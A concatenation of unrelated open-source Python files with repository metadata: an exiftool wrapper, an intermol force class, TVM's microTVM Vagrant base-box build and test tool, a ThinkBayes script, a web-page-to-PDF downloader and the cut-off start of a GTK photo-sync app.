_, _, error = self.run_commands(*command)
return error == ""
def addvalues(self, tag, *values):
"""Add one or more value(s) to tag
If more than one value is passed, each value will be added to the tag
Args:
tag: str; tag to set
*values: str; one or more values to set
Returns:
True if success otherwise False
If error generated by exiftool, returns False and sets self.error to error string
If warning generated by exiftool, returns True (unless there was also an error) and sets self.warning to warning string
If called in context manager, returns True (execution is delayed until exiting context manager)
Notes: exiftool may add duplicate values for some tags so the caller must ensure
the values being added are not already in the EXIF data
For some tags, such as IPTC:Keywords, this will add a new value to the list of keywords,
but for others, such as EXIF:ISO, this will literally add a value to the existing value.
It's up to the caller to know what exiftool will do for each tag
If setvalue called before addvalues, exiftool does not appear to add duplicates,
but if addvalues called without first calling setvalue, exiftool will add duplicate values
"""
if not values:
raise ValueError("Must pass at least one value")
command = []
for value in values:
if value is None:
raise ValueError("Can't add None value to tag")
value = escape_str(value)
command.append(f"-{tag}+={value}")
if self.overwrite and not self._context_mgr:
command.append("-overwrite_original")
if self._context_mgr:
self._commands.extend(command)
return True
else:
_, _, error = self.run_commands(*command)
return error == ""
def run_commands(self, *commands, no_file=False):
"""Run commands in the exiftool process and return result.
Args:
*commands: exiftool commands to run
no_file: (bool) do not pass the filename to exiftool (default=False)
by default, all commands will be run against self.file
use no_file=True to run a command without passing the filename
Returns:
(output, warning, errror)
output: bytes is containing output of exiftool commands
warning: if exiftool generated warnings, string containing warning otherwise empty string
error: if exiftool generated errors, string containing otherwise empty string
Note: Also sets self.warning and self.error if warning or error generated.
"""
if not (hasattr(self, "_process") and self._process):
raise ValueError("exiftool process is not running")
if not commands:
raise TypeError("must provide one or more command to run")
if self._context_mgr and self.overwrite:
commands = list(commands)
commands.append("-overwrite_original")
filename = os.fsencode(self.file) if not no_file else b""
if self.flags:
# need to split flags, e.g. so "--ext AVI" becomes ["--ext", "AVI"]
flags = []
for f in self.flags:
flags.extend(f.split())
command_str = b"\n".join([f.encode("utf-8") for f in flags])
command_str += b"\n"
else:
command_str = b""
command_str += (
b"\n".join([c.encode("utf-8") for c in commands])
+ b"\n"
+ filename
+ b"\n"
+ b"-execute\n"
)
# send the command
self._process.stdin.write(command_str)
self._process.stdin.flush()
# read the output
output = b""
warning = b""
error = b""
while EXIFTOOL_STAYOPEN_EOF not in str(output):
line = self._process.stdout.readline()
if line.startswith(b"Warning"):
warning += line.strip()
elif line.startswith(b"Error"):
error += line.strip()
else:
output += line.strip()
warning = "" if warning == b"" else warning.decode("utf-8")
error = "" if error == b"" else error.decode("utf-8")
self.warning = warning
self.error = error
return output[:-EXIFTOOL_STAYOPEN_EOF_LEN], warning, error
@property
def pid(self):
"""return process id (PID) of the exiftool process"""
return self._process.pid
@property
def version(self):
"""returns exiftool version"""
ver, _, _ = self.run_commands("-ver", no_file=True)
return ver.decode("utf-8")
def asdict(self, tag_groups=True, normalized=False):
"""return dictionary of all EXIF tags and values from exiftool
returns empty dict if no tags
Args:
tag_groups: if True (default), dict keys have tag groups, e.g. "IPTC:Keywords"; if False, drops groups from keys, e.g. "Keywords"
normalized: if True, dict keys are all normalized to lower case (default is False)
"""
json_str, _, _ = self.run_commands("-json")
if not json_str:
return dict()
json_str = unescape_str(json_str.decode("utf-8"))
try:
exifdict = json.loads(json_str)
except Exception as e:
# will fail with some commands, e.g --ext AVI which produces
# 'No file with specified extension' instead of json
return dict()
exifdict = exifdict[0]
if not tag_groups:
# strip tag groups
exif_new = {}
for k, v in exifdict.items():
k = re.sub(r".*:", "", k)
exif_new[k] = v
exifdict = exif_new
if normalized:
exifdict = {k.lower(): v for (k, v) in exifdict.items()}
return exifdict
def json(self):
"""returns JSON string containing all EXIF tags and values from exiftool"""
json, _, _ = self.run_commands("-json")
json = unescape_str(json.decode("utf-8"))
return json
def _read_exif(self):
"""read exif data from file"""
data = self.asdict()
self.data = {k: v for k, v in data.items()}
def __str__(self):
return f"file: {self.file}\nexiftool: {self._exiftoolproc._exiftool}"
def __enter__(self):
self._context_mgr = True
self._commands = []
return self
def __exit__(self, exc_type, exc_value, traceback):
if exc_type:
return False
elif self._commands:
# run_commands sets self.warning and self.error as needed
self.run_commands(*self._commands)
class ExifToolCaching(ExifTool):
"""Basic exiftool interface for reading and writing EXIF tags, with caching.
Use this only when you know the file's EXIF data will not be changed by any external process.
Creates a singleton cached ExifTool instance"""
_singletons = {}
def __new__(cls, filepath, exiftool=None):
"""create new object or return instance of already created singleton"""
if filepath not in cls._singletons:
cls._singletons[filepath] = _ExifToolCaching(filepath, exiftool=exiftool)
return cls._singletons[filepath]
class _ExifToolCaching(ExifTool):
def __init__(self, filepath, exiftool=None):
"""Create read-only ExifTool object that caches values
Args:
file: path to image file
exiftool: path to exiftool, if not specified will look in path
Returns:
ExifTool instance
"""
self._json_cache = None
self._asdict_cache = {}
super().__init__(filepath, exiftool=exiftool, overwrite=False, flags=None)
def run_commands(self, *commands, no_file=False):
if commands[0] not in ["-json", "-ver"]:
raise NotImplementedError(f"{self.__class__} is read-only")
return super().run_commands(*commands, no_file=no_file)
def setvalue(self, tag, value):
raise NotImplementedError(f"{self.__class__} is read-only")
def addvalues(self, tag, *values):
raise NotImplementedError(f"{self.__class__} is read-only")
def json(self):
if not self._json_cache:
self._json_cache = super().json()
return self._json_cache
def asdict(self, tag_groups=True, normalized=False):
"""return dictionary of all EXIF tags and values from exiftool
returns empty dict if no tags
Args:
tag_groups: if True (default), dict keys have tag groups, e.g. "IPTC:Keywords"; if False, drops groups from keys, e.g. "Keywords"
normalized: if True, dict keys are all normalized to lower case (default is False)
"""
try:
return self._asdict_cache[tag_groups][normalized]
except KeyError:
if tag_groups not in self._asdict_cache:
self._asdict_cache[tag_groups] = {}
self._asdict_cache[tag_groups][normalized] = super().asdict(
tag_groups=tag_groups, normalized=normalized
)
return self._asdict_cache[tag_groups][normalized]
def flush_cache(self):
"""Clear cached data so that calls to json or asdict return fresh data"""
self._json_cache = None
self._asdict_cache = {}
| 35.962105 | 141 | 0.610233 |
4a1b5aa1903da83733372e7525fb4fab6b6df0cc
| 1,863 |
py
|
Python
|
intermol/forces/urey_bradley_angle_type.py
|
ctk3b/intermol
|
5224b0a01e6db02ecb9dc1e6996a6df5e9bf630d
|
[
"MIT"
] | null | null | null |
intermol/forces/urey_bradley_angle_type.py
|
ctk3b/intermol
|
5224b0a01e6db02ecb9dc1e6996a6df5e9bf630d
|
[
"MIT"
] | 5 |
2015-01-06T13:21:51.000Z
|
2015-01-20T21:39:11.000Z
|
intermol/forces/urey_bradley_angle_type.py
|
ctk3b/intermol
|
5224b0a01e6db02ecb9dc1e6996a6df5e9bf630d
|
[
"MIT"
] | null | null | null |
import simtk.unit as units
from intermol.decorators import accepts_compatible_units
from intermol.forces.abstract_angle_type import AbstractAngleType
class UreyBradleyAngleType(AbstractAngleType):
__slots__ = ['theta', 'k', 'r', 'kUB', 'c']
@accepts_compatible_units(None, None, None,
theta=units.degrees,
k=units.kilojoules_per_mole * units.radians ** (-2),
r=units.nanometers,
kUB=units.kilojoules_per_mole * units.nanometers ** (-2),
c=None)
def __init__(self, bondingtype1, bondingtype2, bondingtype3,
theta=0.0 * units.degrees,
k=0.0 * units.kilojoules_per_mole * units.radians ** (-2),
r=0.0 * units.nanometers,
kUB=0.0 * units.kilojoules_per_mole * units.nanometers ** (-2),
c=False):
AbstractAngleType.__init__(self, bondingtype1, bondingtype2, bondingtype3, c)
self.theta = theta
self.k = k
self.r = r
self.kUB = kUB
class UreyBradleyAngle(UreyBradleyAngleType):
"""
stub documentation
"""
def __init__(self, atom1, atom2, atom3, bondingtype1=None, bondingtype2=None, bondingtype3=None,
theta=0.0 * units.degrees,
k=0.0 * units.kilojoules_per_mole * units.radians ** (-2),
r=0.0 * units.nanometers,
kUB=0.0 * units.kilojoules_per_mole * units.nanometers ** (-2),
c=False):
self.atom1 = atom1
self.atom2 = atom2
self.atom3 = atom3
UreyBradleyAngleType.__init__(self, bondingtype1, bondingtype2, bondingtype3,
theta=theta,
k=k,
r=r,
kUB=kUB,
c=c)
| 39.638298 | 101 | 0.551798 |
4a1b5aea3fecd08b3b1abbd58240d24fb0cf0738
| 22,024 |
py
|
Python
|
apps/microtvm/reference-vm/base-box-tool.py
|
yangulei/tvm
|
d2cbdf381b68134951bfd7525c6a3a67838e5bdf
|
[
"Apache-2.0"
] | 1 |
2021-12-13T22:07:00.000Z
|
2021-12-13T22:07:00.000Z
|
apps/microtvm/reference-vm/base-box-tool.py
|
driazati/tvm
|
b76c817986040dc070d215cf32523d9b2adc8e8b
|
[
"Apache-2.0"
] | 7 |
2022-02-17T23:04:46.000Z
|
2022-03-31T22:22:55.000Z
|
apps/microtvm/reference-vm/base-box-tool.py
|
yelite/tvm
|
7ae919292d42f5858d4db04533bca67b4b5bb44f
|
[
"Apache-2.0"
] | 1 |
2022-02-07T06:50:05.000Z
|
2022-02-07T06:50:05.000Z
|
#!/usr/bin/env python3
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import argparse
from ast import arg
import copy
import json
import logging
import pathlib
import os
import re
import shlex
import shutil
import subprocess
import sys
import pathlib
_LOG = logging.getLogger(__name__)
THIS_DIR = os.path.realpath(os.path.dirname(__file__) or ".")
# List of vagrant providers supported by this tool
ALL_PROVIDERS = (
"parallels",
"virtualbox",
"vmware_desktop",
)
# List of supported electronics platforms. Each must correspond
# to a sub-directory of this directory.
ALL_PLATFORMS = (
"arduino",
"zephyr",
)
# Extra scripts required to execute on provisioning
# in [platform]/base-box/base_box_provision.sh
COMMON_SCRIPTS = [
"apps/microtvm/reference-vm/base_box_setup_common.sh",
"docker/install/ubuntu_install_core.sh",
"docker/install/ubuntu_install_python.sh",
"docker/utils/apt-install-and-clear.sh",
"docker/install/ubuntu1804_install_llvm.sh",
]
EXTRA_SCRIPTS = {
"arduino": [],
"zephyr": [
"docker/install/ubuntu_init_zephyr_project.sh",
"docker/install/ubuntu_install_zephyr_sdk.sh",
"docker/install/ubuntu_install_cmsis.sh",
],
}
PACKER_FILE_NAME = "packer.json"
# List of identifying strings for microTVM boards for testing.
with open(pathlib.Path(THIS_DIR) / ".." / "zephyr" / "template_project" / "boards.json") as f:
zephyr_boards = json.load(f)
with open(pathlib.Path(THIS_DIR) / ".." / "arduino" / "template_project" / "boards.json") as f:
arduino_boards = json.load(f)
ALL_MICROTVM_BOARDS = {
"arduino": arduino_boards.keys(),
"zephyr": zephyr_boards.keys(),
}
def parse_virtualbox_devices():
output = subprocess.check_output(["VBoxManage", "list", "usbhost"], encoding="utf-8")
devices = []
current_dev = {}
for line in output.split("\n"):
if not line.strip():
if current_dev:
if "VendorId" in current_dev and "ProductId" in current_dev:
devices.append(current_dev)
current_dev = {}
continue
key, value = line.split(":", 1)
value = value.lstrip(" ")
current_dev[key] = value
if current_dev:
devices.append(current_dev)
return devices
VIRTUALBOX_USB_DEVICE_RE = (
"USBAttachVendorId[0-9]+=0x([0-9a-z]{4})\n" + "USBAttachProductId[0-9]+=0x([0-9a-z]{4})"
)
def parse_virtualbox_attached_usb_devices(vm_uuid):
output = subprocess.check_output(
["VBoxManage", "showvminfo", "--machinereadable", vm_uuid], encoding="utf-8"
)
r = re.compile(VIRTUALBOX_USB_DEVICE_RE)
attached_usb_devices = r.findall(output, re.MULTILINE)
# List of couples (VendorId, ProductId) for all attached USB devices
return attached_usb_devices
VIRTUALBOX_VID_PID_RE = re.compile(r"0x([0-9A-Fa-f]{4}).*")
def attach_virtualbox(vm_uuid, vid_hex=None, pid_hex=None, serial=None):
usb_devices = parse_virtualbox_devices()
for dev in usb_devices:
m = VIRTUALBOX_VID_PID_RE.match(dev["VendorId"])
if not m:
_LOG.warning("Malformed VendorId: %s", dev["VendorId"])
continue
dev_vid_hex = m.group(1).lower()
m = VIRTUALBOX_VID_PID_RE.match(dev["ProductId"])
if not m:
_LOG.warning("Malformed ProductId: %s", dev["ProductId"])
continue
dev_pid_hex = m.group(1).lower()
if (
vid_hex == dev_vid_hex
and pid_hex == dev_pid_hex
and (serial is None or serial == dev["SerialNumber"])
):
attached_devices = parse_virtualbox_attached_usb_devices(vm_uuid)
for vid, pid in parse_virtualbox_attached_usb_devices(vm_uuid):
if vid_hex == vid and pid_hex == pid:
print(f"USB dev {vid_hex}:{pid_hex} already attached. Skipping attach.")
return
rule_args = [
"VBoxManage",
"usbfilter",
"add",
"0",
"--action",
"hold",
"--name",
"test device",
"--target",
vm_uuid,
"--vendorid",
vid_hex,
"--productid",
pid_hex,
]
if serial is not None:
rule_args.extend(["--serialnumber", serial])
subprocess.check_call(rule_args)
subprocess.check_call(["VBoxManage", "controlvm", vm_uuid, "usbattach", dev["UUID"]])
return
raise Exception(
f"Device with vid={vid_hex}, pid={pid_hex}, serial={serial!r} not found:\n{usb_devices!r}"
)
def attach_parallels(uuid, vid_hex=None, pid_hex=None, serial=None):
usb_devices = json.loads(
subprocess.check_output(["prlsrvctl", "usb", "list", "-j"], encoding="utf-8")
)
for dev in usb_devices:
_, dev_vid_hex, dev_pid_hex, _, _, dev_serial = dev["System name"].split("|")
dev_vid_hex = dev_vid_hex.lower()
dev_pid_hex = dev_pid_hex.lower()
if (
vid_hex == dev_vid_hex
and pid_hex == dev_pid_hex
and (serial is None or serial == dev_serial)
):
subprocess.check_call(["prlsrvctl", "usb", "set", dev["Name"], uuid])
if "Used-By-Vm-Name" in dev:
subprocess.check_call(
["prlctl", "set", dev["Used-By-Vm-Name"], "--device-disconnect", dev["Name"]]
)
subprocess.check_call(["prlctl", "set", uuid, "--device-connect", dev["Name"]])
return
raise Exception(
f"Device with vid={vid_hex}, pid={pid_hex}, serial={serial!r} not found:\n{usb_devices!r}"
)
def attach_vmware(uuid, vid_hex=None, pid_hex=None, serial=None):
print("NOTE: vmware doesn't seem to support automatic attaching of devices :(")
print("The VMWare VM UUID is {uuid}")
print("Please attach the following usb device using the VMWare GUI:")
if vid_hex is not None:
print(f" - VID: {vid_hex}")
if pid_hex is not None:
print(f" - PID: {pid_hex}")
if serial is not None:
print(f" - Serial: {serial}")
if vid_hex is None and pid_hex is None and serial is None:
print(" - (no specifications given for USB device)")
print()
print("Press [Enter] when the USB device is attached")
input()
ATTACH_USB_DEVICE = {
"parallels": attach_parallels,
"virtualbox": attach_virtualbox,
"vmware_desktop": attach_vmware,
}
def generate_packer_config(platform, file_path, providers):
builders = []
provisioners = []
for provider_name in providers:
builders.append(
{
"name": f"{provider_name}",
"type": "vagrant",
"box_name": f"microtvm-base-{provider_name}",
"output_dir": f"output-packer-{provider_name}",
"communicator": "ssh",
"source_path": "generic/ubuntu1804",
"provider": provider_name,
"template": "Vagrantfile.packer-template",
}
)
repo_root = subprocess.check_output(
["git", "rev-parse", "--show-toplevel"], encoding="utf-8"
).strip()
scripts_to_copy = COMMON_SCRIPTS + EXTRA_SCRIPTS[platform]
for script in scripts_to_copy:
script_path = os.path.join(repo_root, script)
filename = os.path.basename(script_path)
provisioners.append({"type": "file", "source": script_path, "destination": f"~/{filename}"})
provisioners.append(
{
"type": "shell",
"script": "base_box_setup.sh",
}
)
provisioners.append(
{
"type": "shell",
"script": "base_box_provision.sh",
}
)
with open(file_path, "w") as f:
json.dump(
{
"builders": builders,
"provisioners": provisioners,
},
f,
sort_keys=True,
indent=2,
)
def build_command(args):
this_dir = pathlib.Path(THIS_DIR)
base_box_dir = this_dir / args.platform / "base-box"
generate_packer_config(
args.platform,
os.path.join(base_box_dir, PACKER_FILE_NAME),
args.provider or ALL_PROVIDERS,
)
env = copy.copy(os.environ)
packer_args = ["packer", "build", "-force"]
env["PACKER_LOG"] = "1"
env["PACKER_LOG_PATH"] = "packer.log"
if args.debug_packer:
packer_args += ["-debug"]
packer_args += [PACKER_FILE_NAME]
box_package_exists = False
if not args.force:
box_package_dirs = [(base_box_dir / f"output-packer-{p}") for p in args.provider]
for box_package_dir in box_package_dirs:
if box_package_dir.exists():
print(f"A box package {box_package_dir} already exists. Refusing to overwrite it!")
box_package_exists = True
if box_package_exists:
sys.exit("One or more box packages exist (see list above). To rebuild use '--force'")
subprocess.check_call(
packer_args, cwd=os.path.join(THIS_DIR, args.platform, "base-box"), env=env
)
REQUIRED_TEST_CONFIG_KEYS = {
"vid_hex": str,
"pid_hex": str,
}
VM_BOX_RE = re.compile(r'(.*\.vm\.box) = "(.*)"')
# Paths, relative to the platform box directory, which will not be copied to release-test dir.
SKIP_COPY_PATHS = [".vagrant", "base-box"]
def do_build_release_test_vm(
release_test_dir, user_box_dir: pathlib.Path, base_box_dir: pathlib.Path, provider_name
):
if os.path.exists(release_test_dir):
try:
subprocess.check_call(["vagrant", "destroy", "-f"], cwd=release_test_dir)
except subprocess.CalledProcessError:
_LOG.warning("vagrant destroy failed--removing dirtree anyhow", exc_info=True)
shutil.rmtree(release_test_dir)
for dirpath, _, filenames in os.walk(user_box_dir):
rel_path = os.path.relpath(dirpath, user_box_dir)
if any(
rel_path == scp or rel_path.startswith(f"{scp}{os.path.sep}") for scp in SKIP_COPY_PATHS
):
continue
dest_dir = os.path.join(release_test_dir, rel_path)
os.makedirs(dest_dir)
for filename in filenames:
shutil.copy2(os.path.join(dirpath, filename), os.path.join(dest_dir, filename))
release_test_vagrantfile = os.path.join(release_test_dir, "Vagrantfile")
with open(release_test_vagrantfile) as f:
lines = list(f)
found_box_line = False
with open(release_test_vagrantfile, "w") as f:
for line in lines:
# Skip setting version
if "config.vm.box_version" in line:
continue
m = VM_BOX_RE.match(line)
if not m:
f.write(line)
continue
box_package = os.path.join(
base_box_dir, f"output-packer-{provider_name}", "package.box"
)
box_relpath = os.path.relpath(box_package, release_test_dir)
f.write(f'{m.group(1)} = "{box_relpath}"\n')
found_box_line = True
if not found_box_line:
_LOG.error(
"testing provider %s: couldn't find config.box.vm = line in Vagrantfile; unable to test",
provider_name,
)
return False
# Delete the old box registered with Vagrant, which may lead to a falsely-passing release test.
remove_args = ["vagrant", "box", "remove", box_relpath]
return_code = subprocess.call(remove_args, cwd=release_test_dir)
assert return_code in (0, 1), f'{" ".join(remove_args)} returned exit code {return_code}'
subprocess.check_call(["vagrant", "up", f"--provider={provider_name}"], cwd=release_test_dir)
return True
def do_run_release_test(release_test_dir, platform, provider_name, test_config, test_device_serial):
with open(
os.path.join(release_test_dir, ".vagrant", "machines", "default", provider_name, "id")
) as f:
machine_uuid = f.read()
# Check if target is not QEMU
if test_config["vid_hex"] and test_config["pid_hex"]:
ATTACH_USB_DEVICE[provider_name](
machine_uuid,
vid_hex=test_config["vid_hex"],
pid_hex=test_config["pid_hex"],
serial=test_device_serial,
)
tvm_home = os.path.realpath(os.path.join(THIS_DIR, "..", "..", ".."))
def _quote_cmd(cmd):
return " ".join(shlex.quote(a) for a in cmd)
test_cmd = (
_quote_cmd(["cd", tvm_home])
+ " && "
+ _quote_cmd(
[
f"apps/microtvm/reference-vm/{platform}/base-box/base_box_test.sh",
test_config["microtvm_board"],
]
)
)
subprocess.check_call(["vagrant", "ssh", "-c", f"bash -ec '{test_cmd}'"], cwd=release_test_dir)
def test_command(args):
user_box_dir = pathlib.Path(THIS_DIR) / args.platform
base_box_dir = user_box_dir / "base-box"
boards_file = pathlib.Path(THIS_DIR) / ".." / args.platform / "template_project" / "boards.json"
with open(boards_file) as f:
test_config = json.load(f)
# select microTVM test config
microtvm_test_config = test_config[args.microtvm_board]
for key, expected_type in REQUIRED_TEST_CONFIG_KEYS.items():
assert key in microtvm_test_config and isinstance(
microtvm_test_config[key], expected_type
), f"Expected key {key} of type {expected_type} in {boards_file}: {test_config!r}"
microtvm_test_config["vid_hex"] = microtvm_test_config["vid_hex"].lower()
microtvm_test_config["pid_hex"] = microtvm_test_config["pid_hex"].lower()
microtvm_test_config["microtvm_board"] = args.microtvm_board
providers = args.provider
release_test_dir = os.path.join(THIS_DIR, f"release-test-{args.platform}")
if args.skip_build or args.skip_destroy:
assert (
len(providers) == 1
), "--skip-build and/or --skip-destroy was given, but >1 provider specified"
test_failed = False
for provider_name in providers:
try:
if not args.skip_build:
do_build_release_test_vm(
release_test_dir, user_box_dir, base_box_dir, provider_name
)
do_run_release_test(
release_test_dir,
args.platform,
provider_name,
microtvm_test_config,
args.test_device_serial,
)
except subprocess.CalledProcessError:
test_failed = True
sys.exit(
f"\n\nERROR: Provider '{provider_name}' failed the release test. "
"You can re-run it to reproduce the issue without building everything "
"again by passing the --skip-build and specifying only the provider that failed. "
"The VM is still running in case you want to connect it via SSH to "
"investigate further the issue, thus it's necessary to destroy it manually "
"to release the resources back to the host, like a USB device attached to the VM."
)
finally:
# if we reached out here do_run_release_test() succeeded, hence we can
# destroy the VM and release the resources back to the host if user haven't
# requested to not destroy it.
if not (args.skip_destroy or test_failed):
subprocess.check_call(["vagrant", "destroy", "-f"], cwd=release_test_dir)
shutil.rmtree(release_test_dir)
print(f'\n\nThe release tests passed on all specified providers: {", ".join(providers)}.')
def release_command(args):
if args.release_full_name:
vm_name = args.release_full_name
else:
vm_name = f"tlcpack/microtvm-{args.platform}"
if not args.skip_creating_release_version:
subprocess.check_call(
[
"vagrant",
"cloud",
"version",
"create",
vm_name,
args.release_version,
]
)
if not args.release_version:
sys.exit(f"--release-version must be specified")
for provider_name in args.provider:
subprocess.check_call(
[
"vagrant",
"cloud",
"publish",
"-f",
vm_name,
args.release_version,
provider_name,
os.path.join(
THIS_DIR,
args.platform,
"base-box",
f"output-packer-{provider_name}/package.box",
),
]
)
def parse_args():
parser = argparse.ArgumentParser(
description="Automates building, testing, and releasing a base box"
)
subparsers = parser.add_subparsers(help="Action to perform.")
subparsers.required = True
subparsers.dest = "action"
parser.add_argument(
"--provider",
choices=ALL_PROVIDERS,
action="append",
required=True,
help="Name of the provider or providers to act on",
)
# "test" has special options for different platforms, and "build", "release" might
# in the future, so we'll add the platform argument to each one individually.
platform_help_str = "Platform to use (e.g. Arduino, Zephyr)"
# Options for build subcommand
parser_build = subparsers.add_parser("build", help="Build a base box.")
parser_build.set_defaults(func=build_command)
parser_build.add_argument("platform", help=platform_help_str, choices=ALL_PLATFORMS)
parser_build.add_argument(
"--debug-packer",
action="store_true",
help=("Run packer in debug mode, and write log to the base-box directory."),
)
parser_build.add_argument(
"--force",
action="store_true",
help=("Force rebuilding a base box from scratch if one already exists."),
)
# Options for test subcommand
parser_test = subparsers.add_parser("test", help="Test a base box before release.")
parser_test.set_defaults(func=test_command)
parser_test.add_argument(
"--skip-build",
action="store_true",
help=(
"If given, assume a box has already been built in the release-test subdirectory, "
"so use that box to execute the release test script. If the tests fail the VM used "
"for testing will be left running for further investigation and will need to be "
"destroyed manually. If all tests pass on all specified providers no VM is left running, "
"unless --skip-destroy is given too."
),
)
parser_test.add_argument(
"--skip-destroy",
action="store_true",
help=(
"Skip destroying the test VM even if all tests pass. Can only be used if a single "
"provider is specified. Default is to destroy the VM if all tests pass (and always "
"skip destroying it if a test fails)."
),
)
parser_test.add_argument(
"--test-device-serial",
help=(
"If given, attach the test device with this USB serial number. Corresponds to the "
"iSerial field from `lsusb -v` output."
),
)
parser_test_platform_subparsers = parser_test.add_subparsers(help=platform_help_str)
for platform in ALL_PLATFORMS:
platform_specific_parser = parser_test_platform_subparsers.add_parser(platform)
platform_specific_parser.set_defaults(platform=platform)
platform_specific_parser.add_argument(
"--microtvm-board",
choices=ALL_MICROTVM_BOARDS[platform],
required=True,
help="MicroTVM board used for testing.",
)
# Options for release subcommand
parser_release = subparsers.add_parser("release", help="Release base box to cloud.")
parser_release.set_defaults(func=release_command)
parser_release.add_argument("platform", help=platform_help_str, choices=ALL_PLATFORMS)
parser_release.add_argument(
"--release-version",
required=True,
help="Version to release, in the form 'x.y.z'. Must be specified with release.",
)
parser_release.add_argument(
"--skip-creating-release-version",
action="store_true",
help="Skip creating the version and just upload for this provider.",
)
parser_release.add_argument(
"--release-full-name",
required=False,
type=str,
default=None,
help=(
"If set, it will use this as the full release name and version for the box. "
"If this set, it will ignore `--release-version`."
),
)
args = parser.parse_args()
return args
def main():
args = parse_args()
if os.path.sep in args.platform or not os.path.isdir(os.path.join(THIS_DIR, args.platform)):
sys.exit(f"<platform> must be a sub-direcotry of {THIS_DIR}; got {args.platform}")
args.func(args)
if __name__ == "__main__":
main()
| 34.092879 | 102 | 0.614284 |
4a1b5b17cf79629fd6bc929d42ec86f413ea0b87
| 1,364 |
py
|
Python
|
scripts/effect.py
|
jkurdys/ThinkBayes2
|
1ebab8c10f2fec5db420f8032b23ea3c7d0f1346
|
[
"MIT"
] | 1,337 |
2015-01-06T06:23:55.000Z
|
2022-03-31T21:06:21.000Z
|
scripts/effect.py
|
jkurdys/ThinkBayes2
|
1ebab8c10f2fec5db420f8032b23ea3c7d0f1346
|
[
"MIT"
] | 43 |
2015-04-23T13:14:15.000Z
|
2022-01-04T12:55:59.000Z
|
scripts/effect.py
|
jkurdys/ThinkBayes2
|
1ebab8c10f2fec5db420f8032b23ea3c7d0f1346
|
[
"MIT"
] | 1,497 |
2015-01-13T22:05:32.000Z
|
2022-03-30T09:19:53.000Z
|
"""This file contains code used in "Think Bayes",
by Allen B. Downey, available from greenteapress.com
Copyright 2014 Allen B. Downey
License: GNU GPLv3 http://www.gnu.org/licenses/gpl.html
"""
from __future__ import print_function, division
from variability import *
import thinkplot
import thinkbayes2
def RunEstimate(update_func, num_points=31, median_flag=False):
"""Runs the whole analysis.
update_func: which of the update functions to use
num_points: number of points in the Suite (in each dimension)
"""
d = ReadHeights(nrows=None)
labels = {1:'male', 2:'female'}
suites = {}
for key, xs in d.items():
label = labels[key]
print(label, len(xs))
Summarize(xs)
xs = thinkbayes2.Jitter(xs, 1.3)
mus, sigmas = FindPriorRanges(xs, num_points, median_flag=median_flag)
suite = Height(mus, sigmas, label)
suites[label] = suite
update_func(suite, xs)
print('MAP', suite.MaximumLikelihood())
# joint distributions of mu and sigma for men and women
suite1 = suites['male']
suite2 = suites['female']
# TODO: compute and plot the distribution of d
def main():
random.seed(17)
func = UpdateSuite5
median_flag = (func == UpdateSuite5)
RunEstimate(func, median_flag=median_flag)
if __name__ == '__main__':
main()
| 23.517241 | 78 | 0.667889 |
4a1b5b4c1c6f066f8916601bd8856b1004dea80b
| 1,575 |
py
|
Python
|
learning/dl-www-to-pdf.py
|
trib0r3/scripts
|
d584acd42ed616ac8aa79137de409b8cc0e81046
|
[
"BSD-2-Clause"
] | null | null | null |
learning/dl-www-to-pdf.py
|
trib0r3/scripts
|
d584acd42ed616ac8aa79137de409b8cc0e81046
|
[
"BSD-2-Clause"
] | null | null | null |
learning/dl-www-to-pdf.py
|
trib0r3/scripts
|
d584acd42ed616ac8aa79137de409b8cc0e81046
|
[
"BSD-2-Clause"
] | null | null | null |
#
# Download WWW pages & convert it into PDF pages
#
# File required: 'style.css' (or delete it from code)
# Files are saved under path <DirectoryName>/interesting-article
# (for url: http://somewebsite.com/somecategory/some/interesting-article)
#
__author__ = "sheadovas"
import pdfkit
import requests
from bs4 import BeautifulSoup
def get_post_html(url):
page = requests.get(url)
if page.status_code is not 200:
print "Error, cannot open: '{}'".format(url)
return
soup = BeautifulSoup(page.content, 'html.parser')
body = soup.find_all('main', id='main', class_='site-main')[0]
return body
def parse_to_pdf(content, dstfile):
TEMPLATE = u"""
<html>
<head>
<meta name="pdfkit-page-size" content="Legal"/>
<meta name="pdfkit-orientation" content="Landscape"/>
<meta charset="UTF-8">
</head>
<body>
{}
</body>
</html>"""
html = TEMPLATE.format(content)
try:
pdfkit.from_string(html, dstfile, css='./style.css')
except Exception as e:
print "!!! Error, Ignore: {}".format(e.strerror)
urls = [
# TODO enter urls HERE, example:
["DirectoryName","http://somewebsite.com/interesting-artice"]
]
i = 1
for pair in urls:
print "==> [{}/{}]".format(i, len(urls))
i += 1
category, url = pair
print "==> {} : {}".format(category, url)
body = get_post_html(url)
title = url.split('/')
filename = "{}/{}.pdf".format(category, title[len(title)-2])
parse_to_pdf(body, filename)
| 24.230769 | 73 | 0.606984 |
4a1b5b589d5f099cb09948efe25545e543719923
| 61,571 |
py
|
Python
|
photosync.py
|
luizoscar/photosync
|
cfdc577d203df71d709182bf375b294f53b6c866
|
[
"Apache-2.0"
] | null | null | null |
photosync.py
|
luizoscar/photosync
|
cfdc577d203df71d709182bf375b294f53b6c866
|
[
"Apache-2.0"
] | null | null | null |
photosync.py
|
luizoscar/photosync
|
cfdc577d203df71d709182bf375b294f53b6c866
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function, unicode_literals
import gi
import sys
import re
import os
import datetime
import time
import getopt
import logging
import math
import shutil
import subprocess
from lxml import etree as ET
from glob import glob
from threading import Thread
from distutils import spawn
from __builtin__ import str
gi.require_version('Gtk', '3.0')
gi.require_version('Gdk', '3.0')
from gi.repository import Gdk, Gtk, GObject, GLib
class VideoEncodeProgressDialog(Gtk.Dialog):
"""
Dialog utilizada para exibir o progresso da conversão de vídeos
"""
total = 0
completed_size = 0
must_stop = False
failed = False
def __init__(self, parent, arquivos, destino):
Gtk.Dialog.__init__(self, "Compactando vídeos ", parent, 0,
(Gtk.STOCK_CANCEL, Gtk.ResponseType.CANCEL))
self.set_size_request(250, 150)
self.set_border_width(10)
self.lista_arquivos = arquivos
self.dir_destino = destino
# Container principal
grid = Gtk.Grid()
grid.set_column_homogeneous(True)
